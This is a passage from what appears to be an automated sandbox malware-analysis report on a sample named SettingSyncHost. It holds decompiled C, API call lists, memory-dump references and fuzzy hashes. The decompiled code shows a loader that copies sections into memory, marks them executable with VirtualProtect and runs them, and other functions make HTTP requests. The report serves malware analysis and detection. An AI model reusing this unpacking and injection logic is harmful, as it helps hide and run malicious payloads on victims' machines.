				_v12 = _v60 + ( *(_v60 + 0x14) & 0x0000ffff) + 0x18;
				_t138 = _t136 + 8 - 8;
				_t157 =  *0xfbbc50;
				 *_t138 = _t157;
				E00F93700(_v60);
				 *_t138 = _t157;
				E00F935B0(_t117);
				 *_t138 = _t157;
				E00F93460(_t117);
				 *_t138 = _t157;
				E00F93340();
				st0 = _t157;
				_v24 =  *((intOrPtr*)(_v60 + 6));
				_t140 = _t138 + 8 - 8;
				_t158 =  *0xfbbc50;
				 *_t140 = _t158;
				E00F93700(_t117);
				 *_t140 = _t158;
				E00F935B0(_t117);
				 *_t140 = _t158;
				E00F93460(_t117);
				 *_t140 = _t158;
				E00F93340();
				st0 = _t158;
				_t142 = _t140 + 8 - 8;
				_t159 =  *0xfbbc50;
				 *_t142 = _t159;
				E00F93700(_t117);
				 *_t142 = _t159;
				E00F935B0(_t117);
				 *_t142 = _t159;
				E00F93460(_t117);
				 *_t142 = _t159;
				E00F93340();
				st0 = _t159;
				_t143 = _t142 + 8;
				_v36 = 0;
				while((_v36 & 0x0000ffff) < (_v24 & 0x0000ffff)) {
					_t149 = _t143 - 8;
					_t162 =  *0xfbbc50;
					 *_t149 = _t162;
					E00F93700(_t117);
					 *_t149 = _t162;
					E00F935B0(_t117);
					 *_t149 = _t162;
					E00F93460(_t117);
					 *_t149 = _t162;
					E00F93340();
					st0 = _t162;
					_t117 =  *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0xfc8900;
					E00F938C0( *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0xfc8900, _a4 +  *((intOrPtr*)(_v12 + 0x14 + (_v36 & 0x0000ffff) * 0x28)),  *((intOrPtr*)(_v12 + 0x10 + (_v36 & 0x0000ffff) * 0x28)));
					_t152 = _t149 + 0x14 - 8;
					_t163 =  *0xfbbc50;
					 *_t152 = _t163;
					E00F93700( *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0xfc8900);
					 *_t152 = _t163;
					E00F935B0( *((intOrPtr*)(_v12 + 0xc + (_v36 & 0x0000ffff) * 0x28)) + 0xfc8900);
					 *_t152 = _t163;
					E00F93460(_t117);
					 *_t152 = _t163;
					E00F93340();
					st0 = _t163;
					_t143 = _t152 + 8;
					_v36 = _v36 + 1;
				}
				_t144 = _t143 - 8;
				_t160 =  *0xfbbc50;
				 *_t144 = _t160;
				E00F93700(_t117);
				 *_t144 = _t160;
				E00F935B0(_t117);
				 *_t144 = _t160;
				E00F93460(_t117);
				 *_t144 = _t160;
				E00F93340();
				st0 = _t160;
				_t145 = _t144 + 8;
				_t118 =  *(_v60 + 0x50);
				_t75 = VirtualProtect(0xfc8900, _t118, 0x40,  &_v48); // executed
				__eflags = _t145 - _t145;
				E00F931A1(_t75, _t145 - _t145);
				_t146 = _t145 - 8;
				_t161 =  *0xfbbc50;
				 *_t146 = _t161;
				E00F93700(_t118);
				 *_t146 = _t161;
				E00F935B0(_t118);
				 *_t146 = _t161;
				E00F93460(_t118);
				 *_t146 = _t161;
				_t80 = E00F93340();
				st0 = _t161;
				_push(_t118);
				E00F931C4(0xf9256c);
				_t82 = _t80;
				__eflags = _t130 - _t146 + 0x104;
				return E00F931A1(_t82, _t130 - _t146 + 0x104);
			}

0x00f922c0
0x00f922dc
0x00f922e4
0x00f922e7
0x00f922ea
0x00f922ed
0x00f922f3
0x00f922f6
0x00f922fb
0x00f922fe
0x00f92303
0x00f92306
0x00f9230b
0x00f9230e
0x00f92313
0x00f9231f
0x00f92328
0x00f92330
0x00f92333
0x00f92339
0x00f9233c
0x00f92341
0x00f92344
0x00f92349
0x00f9234c
0x00f92351
0x00f92354
0x00f92359
0x00f92365
0x00f9236c
0x00f9236f
0x00f92372
0x00f92378
0x00f9237b
0x00f92380
0x00f92383
0x00f92388
0x00f9238b
0x00f92390
0x00f92393
0x00f92398
0x00f923a4
0x00f923a8
0x00f923ab
0x00f923b1
0x00f923b4
0x00f923b9
0x00f923bc
0x00f923c1
0x00f923c4
0x00f923c9
0x00f923cc
0x00f923d1
0x00f923d6
0x00f923d9
0x00f923df
0x00f923e2
0x00f923e7
0x00f923ea
0x00f923ef
0x00f923f2
0x00f923f7
0x00f923fa
0x00f923ff
0x00f92401
0x00f92406
0x00f92418
0x00f92428
0x00f9242b
0x00f92431
0x00f92434
0x00f92439
0x00f9243c
0x00f92441
0x00f92444
0x00f92449
0x00f9244c
0x00f92451
0x00f92485
0x00f9248c
0x00f92494
0x00f92497
0x00f9249d
0x00f924a0
0x00f924a5
0x00f924a8
0x00f924ad
0x00f924b0
0x00f924b5
0x00f924b8
0x00f924bd
0x00f924bf
0x00f92414
0x00f92414
0x00f924c7
0x00f924ca
0x00f924d0
0x00f924d3
0x00f924d8
0x00f924db
0x00f924e0
0x00f924e3
0x00f924e8
0x00f924eb
0x00f924f0
0x00f924f2
0x00f92500
0x00f92509
0x00f9250f
0x00f92511
0x00f92516
0x00f92519
0x00f9251f
0x00f92522
0x00f92527
0x00f9252a
0x00f9252f
0x00f92532
0x00f92537
0x00f9253a
0x00f9253f
0x00f92544
0x00f9254e
0x00f92553
0x00f9255e
0x00f92568

APIs

_memmove.LIBCMT ref: 00F92328
_memmove.LIBCMT ref: 00F9248C
VirtualProtect.KERNELBASE(00FC8900,?,00000040,?), ref: 00F92509
@_RTC_CheckStackVars@8.LIBCMT ref: 00F9254E

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: _memmove$CheckProtectStackVars@8Virtual
String ID:
API String ID: 1924416307-0
Opcode ID: a219ba49f7deab1850a3f74f4a14e6607b99fda761cf8ebd08b05f71d783a4ff
Instruction ID: f1639249a989a758929a631ccdc815fc1403e6edfedc8d575a5a53c3a65a4fc1
Opcode Fuzzy Hash: a219ba49f7deab1850a3f74f4a14e6607b99fda761cf8ebd08b05f71d783a4ff
Instruction Fuzzy Hash: 5C6112B1908409D6EF08BF68EC8A87DFFB0EF44705F0149A9F4C056192DF394A68E75A

Uniqueness

Uniqueness Score: -1.00%

Function 00FD12A0, Relevance: 6.1, APIs: 4, Instructions: 85
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,00000000,00000001), ref: 00FD1306
HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00FD1327
InternetCloseHandle.WININET(00000000), ref: 00FD1332
InternetCloseHandle.WININET(00000000), ref: 00FD136B

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: CloseHandleHttpInternetRequest$OpenSend
String ID:
API String ID: 2920616234-0
Opcode ID: 37d1380d90bfff7454a92e59cbf71afef9f2ad1c87851677ee03c54fa535abe9
Instruction ID: aa17aff7ac71fbc2fbd87469e7c08a95f9b0fb06f7d3723206edf2be1c5ca646
Opcode Fuzzy Hash: 37d1380d90bfff7454a92e59cbf71afef9f2ad1c87851677ee03c54fa535abe9
Instruction Fuzzy Hash: 4721AD31701604BFE724CF50CC44F6AB7A9FF06710F18415AE9169B780CB72AC41DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00F91200, Relevance: 3.2, APIs: 2, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe21ee2207715e9af2ac28ec29f9feb20490cad69440d008f6e3f7c62dfab66
Instruction ID: 32a09576ca824c33fbf1966f2396958634191c378842271411ec12c1a4543966
Opcode Fuzzy Hash: 5fe21ee2207715e9af2ac28ec29f9feb20490cad69440d008f6e3f7c62dfab66
Instruction Fuzzy Hash: B671E1B090850AC6EB09BF29EC8E56CFFB0FF44B55F0509A8F4C455195EF3A0A28975B

Uniqueness

Uniqueness Score: -1.00%

Function 00FD8ED5, Relevance: 1.6, APIs: 1, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00FCA4FE

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 3bc199664f91ff338ce98b5dd1f845fc9aacd0dbefbaefccd5ce8a1cfab2a36e
Instruction ID: 641280b6888b40ff3743e5af9d56ff725a8a1c9e02d9fce6e885831c2c0b8a4c
Opcode Fuzzy Hash: 3bc199664f91ff338ce98b5dd1f845fc9aacd0dbefbaefccd5ce8a1cfab2a36e
Instruction Fuzzy Hash: 58012B7280030EA7C714AFD9EC05D9A776D9E003B4F144627F608DB661FFB0F945A695

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD2F0, Relevance: 1.5, APIs: 1, Instructions: 43
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

gethostname.WS2_32(?,00000100), ref: 00FCD32F

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: gethostname
String ID:
API String ID: 144339138-0
Opcode ID: aaafb11a1165bc310ed73ce083bcaf723541f70699b0e2833dc715fc7fed172a
Instruction ID: 0da76584aa70f58a050e5fd3cd0a42fa92389695126a5fb7a351277965d8be70
Opcode Fuzzy Hash: aaafb11a1165bc310ed73ce083bcaf723541f70699b0e2833dc715fc7fed172a
Instruction Fuzzy Hash: A501D4B4A0021D9BCB20DF24DD41BEDB7B8AB15304F0401DDE585A7281DBB56B89DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00FE5CF9, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00FDB376,?,?,?,00000000,?,00FCB0A7,?,?,?), ref: 00FE5D2B

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e6633d13a150bc328e823c31d87e37962c6085f1234256e221e48c289d8c095e
Instruction ID: f3dab3ba640e3e4f69ab6ce4e473cdc8695b9147771f9c849e246962a6d59754
Opcode Fuzzy Hash: e6633d13a150bc328e823c31d87e37962c6085f1234256e221e48c289d8c095e
Instruction Fuzzy Hash: 90E0ED32A08EE566D7312767AC0DBAA7A4C9F41BB4F150120FC409B180CB64CD00B6A0

Uniqueness

Uniqueness Score: -1.00%

Function 00FDF6C0, Relevance: 1.5, APIs: 1, Instructions: 11
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00FDF6D3

Part of subcall function 00FE5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,00FECBF2,00FCB0A7,00000000,00FCB0A7,?,?,00FECE95,00FCB0A7,00000007,00FCB0A7,?,00FED48B,00FCB0A7), ref: 00FE5CD5
Part of subcall function 00FE5CBF: GetLastError.KERNEL32(00FCB0A7,?,00FECBF2,00FCB0A7,00000000,00FCB0A7,?,?,00FECE95,00FCB0A7,00000007,00FCB0A7,?,00FED48B,00FCB0A7,00FCB0A7), ref: 00FE5CE7

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: 7f334d11bf63b34a61679b09cd90951c4efdc5bf7b07eca571a903496f50c1da
Instruction ID: 6d4f491bdc0cde78e6ca5f38b741bc6ae83cb7acf6b1fd9ae3f01be6ac74b866
Opcode Fuzzy Hash: 7f334d11bf63b34a61679b09cd90951c4efdc5bf7b07eca571a903496f50c1da
Instruction Fuzzy Hash: 6FC08C31000208BBCB009F46C906A4E7BA8DB80368F200044F80117340CAB1EE00A680

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00FF170D, Relevance: 12.0, APIs: 1, Strings: 5, Instructions: 1455COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00FF18C9

Strings

uz-uz-latn, xrefs: 00FF17CA
1#SNAN, xrefs: 00FF2BB0
1#QNAN, xrefs: 00FF2BBA
1#INF, xrefs: 00FF2BC4
1#IND, xrefs: 00FF2BA6

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$uz-uz-latn
API String ID: 4168288129-3212097587
Opcode ID: 32da46d1303eef7345216ec6d2c59b3b381e5515319bb751ea7249c345fb9420
Instruction ID: de368bb5fa52abdcfd4211876ff0695a3549d5e3cf80da42af09850152c1d17f
Opcode Fuzzy Hash: 32da46d1303eef7345216ec6d2c59b3b381e5515319bb751ea7249c345fb9420
Instruction Fuzzy Hash: 70D21772E0862C8BDB65CE28CD407EAB7B5EF44315F1441EAD90DE7250E778AE81AF41

Uniqueness

Uniqueness Score: -1.00%

Function 00FEDD0D, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FE5A10: GetLastError.KERNEL32(?,?,?,00FDE7AE,?,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5A15
Part of subcall function 00FE5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5AB3

GetACP.KERNEL32(?,?,?,?,?,?,00FE25CA,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00FEDDCE
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00FE25CA,?,?,?,00000055,?,-00000050,?,?), ref: 00FEDDF9
_wcschr.LIBVCRUNTIME ref: 00FEDE8D
_wcschr.LIBVCRUNTIME ref: 00FEDE9B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00FEDF5C

Strings

utf8, xrefs: 00FEDECB

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 2bd250a1a6049b306881d5367454307f37dedc48bcb8cc1f385317580d799809
Instruction ID: 44d80ef1da9e44005df81f491441145e874071d9fcde5275ec85e4d95862757b
Opcode Fuzzy Hash: 2bd250a1a6049b306881d5367454307f37dedc48bcb8cc1f385317580d799809
Instruction Fuzzy Hash: F0710871A00385AADB34AB36CC46BBB73A8EF44710F14443AF905DB981EB78D940E760

Uniqueness

Uniqueness Score: -1.00%

Function 00FEE499, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00FEE7B7,00000002,00000000,?,?,?,00FEE7B7,?,00000000), ref: 00FEE532
GetLocaleInfoW.KERNEL32(00000000,20001004,00FEE7B7,00000002,00000000,?,?,?,00FEE7B7,?,00000000), ref: 00FEE55B
GetACP.KERNEL32(?,?,00FEE7B7,?,00000000), ref: 00FEE570

Strings

ACP, xrefs: 00FEE4B7
OCP, xrefs: 00FEE4ED

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 1bba1c6caefceccd5a40e163846157c1f38ea3e654d6371ec4ea7e6150e2dd21
Instruction ID: 1bb2b51300b54e3c64a5abbe401edbd69b2e3fb651d89df7fe47a54b2cfcd19d
Opcode Fuzzy Hash: 1bba1c6caefceccd5a40e163846157c1f38ea3e654d6371ec4ea7e6150e2dd21
Instruction Fuzzy Hash: 05219022E00284A6DB30CF16ED00AA773A6AF50F78F5E8465E906DB255FB32DE41F350

Uniqueness

Uniqueness Score: -1.00%

Function 00F9AC3E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00F9AC3E(void* __edi, char* __esi) {
				short _v8;
				void* _t24;

				_t24 = __edi;
				if(__esi == 0 ||  *__esi == 0 || E00F9AB40(__esi, ?str?) == 0) {
					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
						if(_v8 != 0) {
							goto L5;
						} else {
							return GetACP();
						}
					} else {
						goto L8;
					}
				} else {
					if(E00F9AB40(__esi, ?str?) != 0) {
						_v8 = E00FA2D16(__esi);
						goto L5;
					} else {
						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
							L8:
							return 0;
						} else {
							L5:
							return _v8;
						}
					}
				}
			}

0x00f9ac3e
0x00f9ac46
0x00f9acae
0x00f9acb8
0x00000000
0x00f9acba
0x00f9acc1
0x00f9acc1
0x00000000
0x00000000
0x00000000
0x00f9ac5e
0x00f9ac6d
0x00f9ac93
0x00000000
0x00f9ac6f
0x00f9ac85
0x00f9acb0
0x00f9acb3
0x00f9ac87
0x00f9ac87
0x00f9ac8b
0x00f9ac8b
0x00f9ac85
0x00f9ac6d

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00F9B2A7,?,00F94307,?,000000BC,?,00000001,00000000,00000000), ref: 00F9AC7D
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00F9B2A7,?,00F94307,?,000000BC,?,00000001,00000000,00000000), ref: 00F9ACA6
GetACP.KERNEL32(?,?,00F9B2A7,?,00F94307,?,000000BC,?,00000001,00000000), ref: 00F9ACBA

Strings

ACP, xrefs: 00F9AC4D
OCP, xrefs: 00F9AC5E

Memory Dump Source

Source File: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 153cfb528affac1aff99d7b8f2d797c231930d89e023d15850dc61567d92aa72
Instruction ID: 44b35270cd637bf32ff79f030361a9b0c67ee47471ba0fd86b4212c70063fee3
Opcode Fuzzy Hash: 153cfb528affac1aff99d7b8f2d797c231930d89e023d15850dc61567d92aa72
Instruction Fuzzy Hash: EA01D435A01207BBFF219B55AD06F9E77A9AF41324F200058F101E6082EB75DE41A3D6

Uniqueness

Uniqueness Score: -1.00%

Function 00FEE66E, Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FE5A10: GetLastError.KERNEL32(?,?,?,00FDE7AE,?,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5A15
Part of subcall function 00FE5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00FDE33E,?,?,?), ref: 00FE5AB3

Part of subcall function 00FE5A10: _free.LIBCMT ref: 00FE5A72
Part of subcall function 00FE5A10: _free.LIBCMT ref: 00FE5AA8

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00FEE77A
IsValidCodePage.KERNEL32(00000000), ref: 00FEE7C3
IsValidLocale.KERNEL32(?,00000001), ref: 00FEE7D2
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00FEE81A
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00FEE839

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: c79ca0ba114151e22dcd749a2811ef70a0ae0873b2467da5790d5f5d3f025884
Instruction ID: 4e00057e5486c33ec9ef71c3cf03841c04f9894691c81c2a82ccc8cee159e245
